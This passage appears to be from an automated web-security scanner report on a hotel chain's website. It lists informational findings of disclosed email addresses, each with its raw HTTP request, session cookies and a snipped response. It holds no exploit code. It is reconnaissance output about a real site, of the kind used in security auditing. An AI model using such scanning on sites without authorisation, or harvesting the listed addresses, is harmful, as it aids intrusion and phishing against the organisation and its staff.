Date: Tue, 12 Oct 2010 02:27:51 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:27:51 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=abe29acb6d5854615f44223bd3203ec3; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Disclaimer and T&Cs - Red Carna
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.26. http://www.redcarnationhotels.com/company-information/privacy-policy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/privacy-policy

Issue detail

The following email addresses were disclosed in the response:

Request

GET /company-information/privacy-policy HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/company-information/about-us
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:30:00 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:30:00 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=0043ff72577cd51e6272e4571531dea3; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Privacy Policy - Red Carnation
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
<a href="mailto:emarketing@rchmail.com">emarketing@rchmail.com</a>
...[SNIP]...
<a href="mailto:emarketing@rchmail.com">emarketing@rchmail.com</a>
...[SNIP]...
6.27. http://www.redcarnationhotels.com/company-information/telephone-bookings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/telephone-bookings

Issue detail

The following email address was disclosed in the response:

Request

GET /company-information/telephone-bookings HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:27:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:27:22 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=2d9594e1a0d09c150978b0da38cd1d55; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Telephone Bookings</title>
<met
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.28. http://www.redcarnationhotels.com/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /contact-us

Issue detail

The following email address was disclosed in the response:

Request

GET /contact-us HTTP/1.1
Host: www.redcarnationhotels.com
Proxy-Connection: keep-alive
Referer: http://www.redcarnationhotels.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmb=187643563; __utmc=187643563; __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:30:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:30:41 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=0d22fa26fc7a3888a78729de3b2aa4c5; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 40448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Contact Us - London, Florida, G
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.29. http://www.redcarnationhotels.com/dining  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /dining

Issue detail

The following email address was disclosed in the response:

Request

GET /dining HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=b403eb641c8dffd747c61c714d9d75b6;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:32:56 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:32:56 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=c8fcf4d5047b7e929197ec16491a2999; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Fine dining & hotel restaurants
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.30. http://www.redcarnationhotels.com/dining/bar-lounge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /dining/bar-lounge

Issue detail

The following email address was disclosed in the response:

Request

GET /dining/bar-lounge HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:49:05 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:49:05 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bar and Lounge - Red Carnation
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.31. http://www.redcarnationhotels.com/dining/food-wine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /dining/food-wine

Issue detail

The following email address was disclosed in the response:

Request

GET /dining/food-wine HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:48:21 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:48:21 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Food and Wine - Boutique Hotels
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.32. http://www.redcarnationhotels.com/dining/food-wine/wine-events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /dining/food-wine/wine-events

Issue detail

The following email address was disclosed in the response:

Request

GET /dining/food-wine/wine-events HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:53:27 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:53:27 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Wine Events - Red Carnation Hot
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.33. http://www.redcarnationhotels.com/dining/seasonal-events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /dining/seasonal-events

Issue detail

The following email address was disclosed in the response:

Request

GET /dining/seasonal-events HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:50:24 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:50:24 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Seasonal Events - Red Carnation
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.34. http://www.redcarnationhotels.com/dining/traditional-treats  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /dining/traditional-treats

Issue detail

The following email address was disclosed in the response:

Request

GET /dining/traditional-treats HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:49:17 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:49:17 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Traditional Treats - Red Carnat
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.35. http://www.redcarnationhotels.com/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /faq

Issue detail

The following email address was disclosed in the response:

Request

GET /faq HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:39:20 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:39:20 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=3691b65d033f07333a5b8076728dd0ba; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>FAQ - Red Carnation Hotels</tit
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.36. http://www.redcarnationhotels.com/gay_friendly_hotels  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /gay_friendly_hotels

Issue detail

The following email address was disclosed in the response:

Request

GET /gay_friendly_hotels HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:31 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:31 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Gay Hotels, Gay Friendly
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.37. http://www.redcarnationhotels.com/gay_london  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /gay_london

Issue detail

The following email address was disclosed in the response:

Request

GET /gay_london HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:45 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Gay Friendly Hotels in London -
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.38. http://www.redcarnationhotels.com/get-more-from-your-stay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /get-more-from-your-stay

Issue detail

The following email addresses were disclosed in the response:

Request

GET /get-more-from-your-stay HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:48:11 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:48:11 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Boutique Hotels London -
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
<br />
E: infosl@rchmail.com </div>
...[SNIP]...
<br />
E: ogh@theoghhotel.com </p>
...[SNIP]...
<br />
E: info@oysterbox.co.za<br />
...[SNIP]...
<br />
E: bookta@12apostles.co.za <br />
...[SNIP]...
<br />
E:bookchpb@rchmail.com <br />
...[SNIP]...
<br />
E: bookan@rchmail.com <br />
...[SNIP]...
6.39. http://www.redcarnationhotels.com/grand-designs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /grand-designs

Issue detail

The following email address was disclosed in the response:

Request

GET /grand-designs HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:59:12 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:59:12 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Grand Designs London Live</titl
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.40. http://www.redcarnationhotels.com/haughton-exhibitors  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /haughton-exhibitors

Issue detail

The following email address was disclosed in the response:

Request

GET /haughton-exhibitors HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:01:53 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:01:53 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Haughton Art Antiques London -
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.41. http://www.redcarnationhotels.com/haughtons-art-antiques-fair  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /haughtons-art-antiques-fair

Issue detail

The following email address was disclosed in the response:

Request

GET /haughtons-art-antiques-fair HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:01:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:01:50 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Haughtons Art Antiques Fair - E
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.42. http://www.redcarnationhotels.com/kate-starkey-couture  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /kate-starkey-couture

Issue detail

The following email address was disclosed in the response:

Request

GET /kate-starkey-couture HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:59:11 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:59:11 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Red Carnation Hotels, Kate Star
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.43. http://www.redcarnationhotels.com/lloydstsb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /lloydstsb

Issue detail

The following email address was disclosed in the response:

Request

GET /lloydstsb HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:59:11 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:59:11 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>LLoyds TSB Premier</title>
<met
...[SNIP]...
<!--
===================================
